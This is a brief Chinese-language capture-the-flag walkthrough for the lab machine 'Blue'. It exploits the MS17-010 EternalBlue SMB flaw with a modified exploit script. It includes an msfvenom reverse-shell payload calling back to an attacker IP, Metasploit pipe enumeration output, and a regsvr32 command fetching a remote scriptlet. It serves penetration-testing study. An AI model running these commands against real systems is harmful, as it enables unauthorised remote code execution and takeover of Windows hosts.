nmap扫描发现139,445端口开启,再加上靶机名叫blue,很容易想到17-010
直接改17-010的py脚本
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)
把原来注释的两行,改改
同时我们需要生产一个exe文件,来让目标靶机执行
msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.5 lport=5678 -f exe > /tmp/exp.exe
存放的路径要跟脚本的路径对应起来
脚本执行的时候,需要有pipe name,用来把exe文件传到靶机上
msf中的auxiliary/scanner/smb/pipe_auditor
模块,可以扫描到开放的pipe
msf5 auxiliary(scanner/smb/pipe_auditor) > exploit
[+] 10.10.10.40:445 - Pipes: \netlogon, \lsarpc, \samr, \browser, \atsvc, \epmapper, \eventlog, \InitShutdown, \keysvc, \lsass, \LSM_API_ser vice, \ntsvcs, \plugplay, \protected_storage, \scerpc, \srvsvc, \trkwks, \wkssvc
[*] 10.10.10.40: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
执行脚本,并且从pipe扫描中随便拿一个用,同时另外一边开启nc监听
python 42315.py 10.10.10.40 lsarpc
还有另一正思路,虽然没成功
直接让目标靶机执行命令
use exploit/multi/script/web_delivery
set target 3
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.40
exploit
regsvr32 /s /n /u /i:regsvr32 /s /n /u /i:http://10.10.14.5:9999/xE1H8gb6.sct scrobj.dll